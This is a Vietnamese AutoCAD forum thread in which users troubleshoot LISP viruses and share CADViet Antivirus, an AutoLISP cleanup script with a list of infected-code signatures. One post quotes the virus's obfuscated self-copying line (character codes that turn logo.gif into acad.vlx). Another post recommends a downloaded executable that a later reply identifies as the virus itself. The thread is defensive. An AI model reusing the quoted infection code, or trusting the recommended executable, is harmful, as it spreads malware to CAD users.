Chuyển đến nội dung
Diễn đàn CADViet
Nguyen Hoanh

CADViet Antivirus !!!

Các bài được khuyến nghị

Sao em cũng làm như cách bác hướng dẫn, down CVAV 1.01 mà vẫn không sửa được bác ơi. Nó vẫn hiện ra acad.lsp mặc dù em đã xóa hết rồi mà nó cứ hiện lại. Các bác giúp em với :unsure: :blink: :blink:

Chia sẻ bài đăng này

Liên kết tới bài đăng
Chia sẻ trên các trang web khác

Mình mới bị nhiễm 1 loại virus cad mới là acad.vlx

Con này sẽ phá hoại dữ liệu mở rộng (xdata) của mọi đối tượng (tạm thời thì mình mới chỉ biết thiệt hại là như thế). nên phạm vi ảnh hưởng của nó là rất lớn.

đoạn code lây nhiễm của nó được tìm thấy trong file C:\Documents and Settings\User name\Application Data\Autodesk\AutoCAD 2010\R18.0\enu\Support\acad.mnl như sau:

(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))

lần theo code này thì nguồn lây nhiễm của nó là file C:\Program Files\AutoCAD 2010\Help\logo.gif

Vì vậy bác nào có bj dính con này thì cách khắc phục nó như sau:

- tìm và xóa tất cả file acad.vlx trong máy

- xóa file C:\Program Files\AutoCAD 2010\Help\logo.gif

- xá file C:\Documents and Settings\User name\Application Data\Autodesk\AutoCAD 2010\R18.0\enu\Support\acad.mnl

các đoạn tô màu đỏ tùy theo user và phiên bản cad bạn đang sử dụng.

Hi vọng bác Hoành sớm cập nhật phiên bản mới của CAV để xử thằng này.

• Vote tăng 1

Chia sẻ bài đăng này

Liên kết tới bài đăng

Mình mới bị nhiễm 1 loại virus cad mới là acad.vlx

Con này sẽ phá hoại dữ liệu mở rộng (xdata) của mọi đối tượng (tạm thời thì mình mới chỉ biết thiệt hại là như thế). nên phạm vi ảnh hưởng của nó là rất lớn.

đoạn code lây nhiễm của nó được tìm thấy trong file C:\Documents and Settings\User name\Application Data\Autodesk\AutoCAD 2010\R18.0\enu\Support\acad.mnl như sau:

(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))

lần theo code này thì nguồn lây nhiễm của nó là file C:\Program Files\AutoCAD 2010\Help\logo.gif

Vì vậy bác nào có bj dính con này thì cách khắc phục nó như sau:

- tìm và xóa tất cả file acad.vlx trong máy

- xóa file C:\Program Files\AutoCAD 2010\Help\logo.gif

- xá file C:\Documents and Settings\User name\Application Data\Autodesk\AutoCAD 2010\R18.0\enu\Support\acad.mnl

các đoạn tô màu đỏ tùy theo user và phiên bản cad bạn đang sử dụng.

Hi vọng bác Hoành sớm cập nhật phiên bản mới của CAV để xử thằng này.

Bác Thái xem ở link này, mục 3

http://www.cadviet.com/forum/index.php?showtopic=32850&view=findpost&p=128846

• Vote tăng 1

Chia sẻ bài đăng này

Liên kết tới bài đăng

Mấy cái này chổ nào vậy các anh?

Giải pháp được đưa ra để khắc phục:

- xóa hết các file acad.lsp trong máy đi, đặt các biến:

- zoomfactor về 60

- mbuttonpan về 1

- HIGHLIGHT về 1

- fillmode về on

Chia sẻ bài đăng này

Liên kết tới bài đăng

mình đã thử mà không đc, lúc trước mình cũng dùng thấy tốt, sau 1 thời gian nó biến thể hay sao mà giờ lại tái hiện lại rồi, sử dụng copy hay move bắt điểm 1 cái là error, lại còn xuất hiện cái đầu lâu nữa chứ.hic

Chia sẻ bài đăng này

Liên kết tới bài đăng

Lâu nay không bệnh nên biếng uống "CADViet Vaccine" để ngừa.

Hôm nay bệnh, uống thử "CADViet Antivirus" thì chả lành.

Bệnh: gọi lệnh "rectang" và "appload" đều không hiểu, các lệnh khác thì được.

Load Antivirus về rồi đưa vào thư mục hiện hành, (load "cvav_1_04.lsp") hoàn thành, nhưng gọi 2 lệnh trên vẫn không được.

Nhờ CV chỉ giùm: đây là bệnh gì, và nên uống thuốc gì?

Thanks!

Trích dẫn sau khi load:

CADViet AntiVirus v1.04 is starting ...

CADViet AntiVirus finishes scanning ...

No infected files were found!

Chia sẻ bài đăng này

Liên kết tới bài đăng

Hà thử đặt dấu chấm ở đầu, ví dụ: .rectang hay .appload xem sao. Nếu không được, nghĩa là ACAD đã hỏng, nếu được, xem lại file acad.pgp

• Vote tăng 1

Chia sẻ bài đăng này

Liên kết tới bài đăng

Hà thử đặt dấu chấm ở đầu, ví dụ: .rectang hay .appload xem sao. Nếu không được, nghĩa là ACAD đã hỏng, nếu được, xem lại file acad.pgp

Thanks! Nh­­ưng chịu rồi! Chắc cài lại cad thôi.

Chia sẻ bài đăng này

Liên kết tới bài đăng

Helpppppppppppp me, em cũng bị như thế này, bro nào còn cách khác khử độc ko, em làm theo hướng dẫn nhưng khi mở file lại vẫn bị, ko tài nào hết được. 2 ngày nay vật lộn tìm đủ mọi cách mà ko thể: CÀi lại win, cad, CAD Anti virus, lsp. Giờ ko giám cóp file sang máy khác để làm việc tiếp, sợ nó lây, kiểu này em chết mất, đồ án sắp nộp nữa chứ:(( Mong các bro ra tay cứu giúp:((

Hình 1: Click trỏ trái:

Hình 2: Click trỏ giữa:

Hình 3: Thử với cvav:

Chia sẻ bài đăng này

Liên kết tới bài đăng

Ah haz, cuối cùng cũng thành công rồi:D sau 1 hồi lần mò giữa CADVIET và 1 số website mình đã fix thành công, nguyên do là chưa hiểu cách dùng cái ACAD anti virus:D

Bác nào sau khi down Acad Antivirus về thì làm theo hướng dẫn này:

"...2. Double click on the downloaded file AutoCAD_Anti-Virus_Protection.exe

3. Run AutoCAD from you PC and click OK on the message that is shown by the virus until it disappear.

4. Type command "ap"

5. A dialog box will appear and just go to "C:\AutoCAD_Anti-Virus_Protection\AutoCAD_Anti-Virus.fas" and click on "Load" button and then "Close" button.

6. Wait until the application finish its scanning process and you will see message "Total infected files were found and removed."

7. Restart your AutoCAD and it's done!

icon_e_biggrin.gif Goodluck!"

Link gốc: http://www.kingdomofwonder.net/forum/viewtopic.php?f=8&t=26

Chúc bác nào chưa fix đc thì nhanh chóng bóp cổ được bọn virus này:D

Chia sẻ bài đăng này

Liên kết tới bài đăng

Ah haz, cuối cùng cũng thành công rồi:D sau 1 hồi lần mò giữa CADVIET và 1 số website mình đã fix thành công, nguyên do là chưa hiểu cách dùng cái ACAD anti virus:D

Bác nào sau khi down Acad Antivirus về thì làm theo hướng dẫn này:

"...2. Double click on the downloaded file AutoCAD_Anti-Virus_Protection.exe

3. Run AutoCAD from you PC and click OK on the message that is shown by the virus until it disappear.

4. Type command "ap"

5. A dialog box will appear and just go to "C:\AutoCAD_Anti-Virus_Protection\AutoCAD_Anti-Virus.fas" and click on "Load" button and then "Close" button.

6. Wait until the application finish its scanning process and you will see message "Total infected files were found and removed."

7. Restart your AutoCAD and it's done!

icon_e_biggrin.gif Goodluck!"

Link gốc: http://www.kingdomof...ic.php?f=8&t=26

Chúc bác nào chưa fix đc thì nhanh chóng bóp cổ được bọn virus này:D

cái file đó mới chính là con virus. Sau khi chạy file AutoCAD_Anti-Virus_Protection.exe nó sẽ sinh ra thư mục Acad_And_Acaddoc chứa 56 file có tên của 24 tỉnh thành cambodia + một thư mục Hatch_And_Linetype + một số file fas, asu đó nó sẽ chép ngẫu nhiên mỗi lần 3-4 file vào các thư mục support của CAD để tự động load khi mở CAD ngoài ra còn chép vào các folder: mydocuments, C:\, C:\windows\systems32\

Nó có thể add thêm menu hoặc toolbar vào CAD của bạn.

Tôi ko biết nó có chép file ARX nào vào phần Auto load của CAD ko.

Ngoài ra nó còn thay đổi các biến hệ thống sau: Blipmode, snapang, snapstyl, pickbox, implied windowing, ...

Do đó khi bị cái message của cambodia thì bạn tìm và xóa các file fas và lsp trong các thư mục support của CAD là dc.

Bạn nào thích nghiên cứu cái này thì dịch ngược mấy cái file fas ra xem nó làm gì vì mình ko rành lisp lắm.

Good luck!

• Vote tăng 2

Chia sẻ bài đăng này

Liên kết tới bài đăng

Em không span được, còn chuột lúc nào cũng là hình ô vuông, còn vào option thì các mục selection thì thanh kéo bị trượt về cuối, không thấy biểu tượng đâu hết

Chia sẻ bài đăng này

Liên kết tới bài đăng

e làm như bác hoành hướng dẫn rồi mà không được ak,

vẫn còn bị lỗi Autocad Message.E up mẫu Acad.lsp lên các bác giúp e với.

không biết có phải mẫu virut mới ko mà sửa không được.nhờ các bác giúp e.

e cảm ơn!

http://www.mediafire.com/?6c7lbrvuf8a95pa

Chia sẻ bài đăng này

Liên kết tới bài đăng

CADViet Antivirus

Anh ơi, cho em hỏi. Cad 2008 của em dùng nó có con trỏ chuột hình ô vuông màu xanh. Em sửa như anh sao nó ko được vậy? Vậy Cad của em bị thế này có dùng cách này được ko? Hayb phải tìm cách khác vậy ạ

Chia sẻ bài đăng này

Liên kết tới bài đăng

Rất nhiều người phàn nàn về việc bị virus acad.lsp,

Nó làm cho máy tính của họ không pan bằng phím giữa được, zoom bằng phím giữa rất chậm, hatch chạy đâu mất, đối tượng được chọn không highlight.

Giải pháp được đưa ra để khắc phục:

- xóa hết các file acad.lsp trong máy đi, đặt các biến:

- zoomfactor về 60

- mbuttonpan về 1

- HIGHLIGHT về 1

- fillmode về on

Nhưng khổ nỗi làm việc trong công ty, mở file qua mạng LAN, mình xóa hết hôm nay, nhưng đến ngày mai thì lại bị lây từ máy khác trong mạng.

Không thể suốt ngày ngồi xóa acad.lsp và đặt lại thông số hệ thống được. CADViet Antivirus sẽ giúp bạn trong tình thế này.

Bạn hãy download file CVAV về (bằng cách click vào nút download) rồi làm theo hướng dẫn:

<pre class="cadvietlispcode">;; --------- Fix acad.lsp virus ---------(setq removedcodelist (list ";; Silent load." "(princ)" "(load \"acadapp\")" "(load \"ddcopy.lsp\")" "(load\"acadiso\")";; v103 "(setq flagx t)" ;; v102 "" ) infectedcodematch (strcat "(load \"acadapp\")," "(load \"ddcopy.lsp\")," "(load\"acadiso\"),";; v103 "(setq path (findfile \"base.dcl\"))," "(strcat c-acaddocpath \"acaddoc.lsp\")";; v103 ) restoresv (list (cons "cmdecho" 1) (cons "zoomfactor" 60) (cons "mbuttonpan" 1) (cons "HIGHLIGHT" 1) (cons "fillmode" 1) ) restorecmd (list "plot" "u" "qsave" "line" "quit" "trim" "extend" "move" "xplode" "xref" "xbind" ))(princ "\n")(princ "\n")(princ "\n****************************************")(princ "\nCADViet AntiVirus v1.04 is starting ...")(setq ifile 0)(vl-load-com)(setq support_path (findfile "base.dcl") support_path (substr support_path 1 (- (strlen support_path) 8)) nowdwg (getvar "dwgname") wjqm (findfile nowdwg) wjqm (if wjqm wjqm nowdwg ) dwg_path (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))) acad_path (vl-filename-directory (findfile "acad.exe")) removedlist (list (strcat acad_path "\\acaddoc.lsp");; v104 (strcat support_path "acadapp.lsp") (strcat support_path "acadappp.lsp") (strcat support_path "ddcopy.lsp") (strcat support_path "acadapq.lsp");; v103 (strcat support_path "acaddoc.lsp");; v103 (strcat dwg_path "acad.lsp") (strcat dwg_path "acaddoc.lsp");; v102 (strcat dwg_path "acaddoc.fas");; v102 (strcat dwg_path "acad.fas");; v102 (strcat dwg_path "acad.vlx");; v102 (strcat dwg_path "acadapq.lsp");; v103 ) fixedlist (list (strcat support_path "acad.mnl") (strcat support_path "acad.lsp") ))(defun fixvr (fn / content infected) (if (setq ff (open fn "r")) (progn (while (setq str (read-line ff)) (if (not (member str removedcodelist)) (setq content (append content (list str))) (if (wcmatch str infectedcodematch) (setq infected t) ) ) ) (close ff) (if infected (progn (setq ff (open fn "w")) (foreach str content (write-line str ff) ) (close ff) (princ (strcat "\nfile " fn " was fixed!")) (setq ifile (1+ ifile)) ) ) ) ))(foreach fn removedlist (if (vl-file-delete fn) (progn (princ (strcat "\nfile " fn " was deleted!")) (setq ifile (1+ ifile)) ) ))(foreach fn fixedlist (fixvr fn))(princ "\nCADViet AntiVirus finishes scanning ...")(if (= ifile 0) (princ "\nNo infected files were found!") (progn (setvar "cmdecho" 0) (mapcar '(lambda (cn) (setvar (car cn) (cdr cn))) restoresv) (mapcar '(lambda (cn) (command ".redefine" cn)) restorecmd) (princ (strcat "\nTotal " (itoa ifile) " infected files were found and removed!" ) ) (setvar "cmdecho" 1) ))(princ "\n****************************************")(princ "\n")(princ "\n");;(defun c:cvav_1_04()(princ))(princ)</pre>

1. Phải chuột vào link rồi chọn save as về máy bạn.

2. Dùng lệnh appload: Tool > Load Application

3. Chọn mục content

4. Nhấn Add

5. Chọn đến file file CVAV.lsp

6. file file CVAV.lsp đã nằm trong danh sách khởi động, nhấn close để kết thúc

Bây giờ bạn đã được bảo vệ khỏi sự quấy nhiễu của acad.lsp, mỗi khi thấy không còn có acad.lsp nữa, bạn muốn gỡ CVAV ra khỏi autocad, chỉ đơn giản là remove CVAV.lsp ra khỏi mục content là được.

Hãy thử sử dụng và cho chúng tôi biết ý kiến của bạn.

Lời khuyên: Hiên nay biến thể của virus này rất nhiều, rất nhiều trong số đó chưa được cập nhật vào trong CADViet Antivirus. Nếu bạn đã cài CADViet Antivirus vào máy thì máy bạn sẽ không bị nhiễm những biến thể thể này (cho dù CVAV chưa cập nhật). Vì vậy, tôi khuyên các bạn (nhất là các bạn không rành về IT) nên cài CADViet Antivirus vào máy tính của bạn vì CADViet Antivirus gần như không ảnh hưởng đến AutoCAD của bạn nhưng bạn sẽ tránh được các rắc rối do biến thể của virus gây nên.

khi e content thì hình như cad nó ko hiểu hay sao mà command nó đơ ra, còn khi load thì lại xài được, hài:D ah e ko nói cái diệt virut này đâu nha.

Chia sẻ bài đăng này

Liên kết tới bài đăng

em đã làm theo hướng dẫn nhưng vẫn máy vẫn ko pan bằng nút cuộn được,zoom chậm,ko Ctrl + P đươc, cross-hair thì méo xệch.hjc.cứu e với

• Vote tăng 1

Chia sẻ bài đăng này

Liên kết tới bài đăng

Ôi !!! đúng lúc em đang bị vài lỗi như bác miêu tả

Em nghe ...giới "Võ Lâm" cadviet đồn là bác Nguyen Hoanh lâu nay hàng ngày vẫn ... "quét chùa" trong " tàng kinh các" "nội lực" uyên thâm , "công phu" đỉnh cao , hôm nay em mới được mở tầm mắt thấy bác ... "quét virus" trong thớt này . Em rất ngưỡng mộ , nói ngắn gọn là : Thank you , I ... love you :D

Hiện nay trên "giang hồ" đang có ... "1 tên ác bá" khiêu khích thách thức nhiều cao thủ . Mong bác xuông tay triệt diệt y

Hắn đây mời bác

http://www.cadviet.com/forum/index.php?showtopic=17934&st=40

Chia sẻ bài đăng này

Liên kết tới bài đăng

Tạo một tài khoản hoặc đăng nhập để nhận xét

Bạn cần phải là một thành viên để lại một bình luận

Tạo tài khoản

Đăng ký một tài khoản mới trong cộng đồng của chúng tôi. Điều đó dễ mà.

Đăng ký tài khoản mới

Đăng nhập

Bạn có sẵn sàng để tạo một tài khoản ? Đăng nhập tại đây.

Đăng nhập ngay